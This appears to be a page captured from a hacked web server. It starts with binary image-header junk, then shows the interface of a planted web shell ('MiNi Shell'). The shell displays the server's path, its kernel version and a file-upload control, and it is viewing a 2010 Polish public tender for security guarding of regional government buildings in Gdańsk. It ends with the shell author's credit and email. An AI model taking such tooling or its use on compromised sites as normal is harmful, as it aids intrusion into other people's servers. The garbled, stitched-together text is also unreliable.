JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101123/379910-N-2010.html

<p class="kh_header"><b>Gdańsk: Usługi ochrony obiektu i mienia w budynkach Urzędu Marszałkowskiego Województwa Pomorskiego zlokalizowanych przy ul. Augustyńskiego 2 i ul. Okopowej 21/27 Gdańsku</b><br>
<b>Numer ogłoszenia: 379910 - 2010; data zamieszczenia: 23.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorząd Województwa Pomorskiego , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 058 3261555, faks 058 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.woj-pomorskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi ochrony obiektu i mienia w budynkach Urzędu Marszałkowskiego Województwa Pomorskiego zlokalizowanych przy ul. Augustyńskiego 2 i ul. Okopowej 21/27 Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiot zamówienia obejmuje następujący zakres usług:
1.1 Wykonawca będzie wykonywał usługi ochrony obiektu i mienia w budynkach zlokalizowanych 
w Gdańsku:
      a) przy ul. Augustyńskiego 2 o pow. użytkowej 3.462,20 m2 położonym na działce gruntu nr 237/7, wpisanym do księgi wieczystej nr GD1G/00138188/0 prowadzonej przez Sąd Rejonowy Gdańsk - Północ, jego pomieszczeń oraz rzeczy znajdujących się w tych pomieszczeniach;
	b) przy ul. Okopowej 21/27  o najmowanej pow. użytkowej 4 594,38 m2.
1.2 Ochrona fizyczna realizowana w formie bezpośredniej, stałej ochrony fizycznej powinna być przeprowadzana przez jednakowo umundurowanych pracowników ochrony.
1.3  Usługa ochrony w budynku:
	a) przy ul. Augustyńskiego 2 będzie świadczona całodobowo przez pracownika ochrony;
	b) przy ul. Okopowej 21/27 będzie świadczona przez pracownika ochrony:
	- od poniedziałku do piątku w godz. od 15.00 do 8.00 dnia następnego
	- od piątku od godz. 15.00 do poniedziałku do godz. 8.00.
1.4 Do obowiązków pracownika ochrony będą należały następujące czynności:
1) obchód budynku wykonywany przynajmniej 1 raz na każdej zmianie - godzina obchodu będzie wpisywana w książce dyżurów (osobnej na każdy budynek), o której mowa w pkt.I.5 SIWZ;
2) przeciwdziałanie kradzieżom, napadom i innym zakłóceniom spokoju;
3) przeciwdziałanie prowadzeniu handlu obnośnego;
4) sprawdzanie zabezpieczenia pomieszczeń w budynkach po godzinie 16.00 (zamknięte okna, drzwi);
     5) wydawanie kluczy upoważnionym pracownikom Urzędu Marszałkowskiego oraz służbom sprzątającym, w przypadku zaistnienia obowiązku stosowania wewnętrznej procedury dysponowania kluczami (dotyczącej ich przyjmowania i wydawania); 
6)  udzielanie informacji o lokalizacji poszczególnych departamentów;
7) egzekwowanie zakazu dotyczącego przebywania po godzinie 16.00 na terenie chronionych budynków, osób nieupoważnionych.

2. Wykonawca zobowiązuje się do: 
1)	zaznajomienia się z numerami telefonów do ekip pogotowia technicznego, służb publicznych typu Policja, Straż Pożarna oraz Departamentu Zamówień Publicznych i Administracji (DAZ) 
w Urzędzie Marszałkowskim;
2)	zapoznania się z procedurami związanymi z przyjmowaniem i wydawaniem kluczy;
3)	informowania Departamentu Zamówień Publicznych i Administracji o wszelkich zauważonych usterkach i nieprawidłowościach;
	4) w przypadku wystąpienia zagrożenia, kradzieży, ingerencji osób trzecich, bądź innych ważnych zdarzeń mających wpływ na stan obiektu/mienia w budynku, niezwłocznego powiadomienia odpowiednich służb publicznych, np. Policji, Straży Pożarnej oraz przedstawiciela zamawiającego - Dyrektora Departamentu Zamówień Publicznych i Administracji lub osoby zastępującej. 

3. Wykonawca będzie prowadził osobną książkę dyżurów w każdym budynku, do której pracownik ochrony Wykonawcy będzie wpisywał wszelkie spostrzeżenia, uwagi oraz istotne wydarzenia związane ze sprawowaniem ochrony obiektu i mienia objętej umową.

4. W terminie do piątego dnia następującego po miesiącu świadczenia usługi, Wykonawca będzie składał Zamawiającemu miesięczną książkę dyżurów, o której mowa w pkt I.5, SIWZ, prowadzoną 
za poprzedni miesiąc.

5. Wykonawca nie może zlecać części bądź całości zadania podwykonawcom bez zgody Zamawiającego wyrażonej na piśmie.

6.  Zamawiający zapewni pracownikom ochrony, dostęp do pomieszczenia socjalnego w miejscu wykonania zamówienia oraz możliwość korzystania z linii telefonicznej, w celach związanych z wykonywaniem przedmiotu zamówienia.
  
7.  Zamawiający będzie na bieżąco przekazywać do dyspozycji pracowników ochrony aktualny  wykaz departamentów wraz z aktualnymi numerami pomieszczeń i lokalizacją..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 13.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy: 

1. Spełniają warunki dotyczące: 
1)  posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Wykonawca spełni warunek w sytuacji, kiedy wykaże, że posiada  Koncesją wydaną przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności w zakresie usług ochrony osób i mienia, zgodnie z ustawą z dnia 
22 sierpnia 1997 roku  o ochronie osób i mienia (t. j. Dz. U. z 2005 r.  Nr 145, poz. 1221 ze. zm.);
1.oświadczenie o spełnianiu warunków udziału w postępowaniu wg. wzoru na załączniku nr 2 do SIWZ; 
2. koncesję wydaną przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia, zgodnie z ustawą z dnia 
22 sierpnia 1997 roku o ochronie osób i mienia (t. j. Dz. U. z 2005 r.  Nr 145, poz. 1221 ze. zm.);

Ocena spełnienia ww. warunków udziału w postępowaniu nastąpi na podstawie dokumentów przedłożonych przez Wykonawcę wyszczególnionych w SIWZ, na zasadzie kwalifikacji spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu wg. wzoru na załączniku nr 2 do SIWZ; 
Ocena spełnienia ww. warunków udziału w postępowaniu nastąpi na podstawie dokumentów przedłożonych przez Wykonawcę wyszczególnionych w SIWZ, na zasadzie kwalifikacji spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu wg. wzoru na załączniku nr 2 do SIWZ; 
Ocena spełnienia ww. warunków udziału w postępowaniu nastąpi na podstawie dokumentów przedłożonych przez Wykonawcę wyszczególnionych w SIWZ, na zasadzie kwalifikacji spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków udziału w postępowaniu wg. wzoru na załączniku nr 2 do SIWZ; 
Ocena spełnienia ww. warunków udziału w postępowaniu nastąpi na podstawie dokumentów przedłożonych przez Wykonawcę wyszczególnionych w SIWZ, na zasadzie kwalifikacji spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się Wykonawcy, którzy: 

1. Spełniają warunki dotyczące: 
4)	sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, a w szczególności jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzenia działalności gospodarczej, tj. w zakresie świadczenia usług ochrony osób i mienia na kwotę nie mniejszą niż 500.000,00 PLN;
3. opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej 
z przedmiotem zamówienia na kwotę  nie mniejszą niż 500.000,00 PLN. 
   W przypadku upływu terminu ważności ubezpieczenia w trakcie realizacji umowy, Wykonawca przedstawi Zamawiającemu, na 14 dni przed wygaśnięciem ubezpieczenia nową polisę, obejmującą okres pozostały do zakończenia trwania umowy.

Ocena spełnienia ww. warunków udziału w postępowaniu nastąpi na podstawie dokumentów przedłożonych przez Wykonawcę wyszczególnionych w SIWZ, na zasadzie kwalifikacji spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>)  Wszelkie zmiany zawartej umowy będą wymagały pisemnego aneksu. Zmiany umowy mogą  dotyczyć:
1)	terminu realizacji zamówienia,
2)	warunków płatności,
3)	zmiany wynagrodzenia w przypadku zmiany ustawowej stawki podatku VAT.

7)  Zmiany, o których mowa w ust. 6 mogą nastąpić jedynie w uzasadnionych przypadkach, 
        a w szczególności:
1)	w zakresie pkt 1,2,3 - w przypadku wystąpienia siły wyższej, tj. katastrofa naturalna, strajk, pożar, eksplozja, wojna, atak terrorystyczny, 
2)  w zakresie pkt 2,3 -  w przypadku zmian powszechnie obowiązujących przepisów prawa 
w trakcie realizacji umowy, w szczególności dotyczących przepisów podatkowych, np. zmiany ustawowej stawki podatku VAT.

8)  Wykonawca wnioskujący o zmianę umowy, przedkłada zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.woj-pomorskie.pl w Biuletynie Informacji Publicznej Zamówienia Publiczne i Ogłoszenia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski Województwa Pomorskiego w Gdańsku ul. Okopowa 21-27, pok.9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2010 godzina 09:00, miejsce: Kancelaria Ogólna pok. 4 Urząd Marszałkowski Województwa Pomorskiego w Gdańsku ul. Okopowa 21-27.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com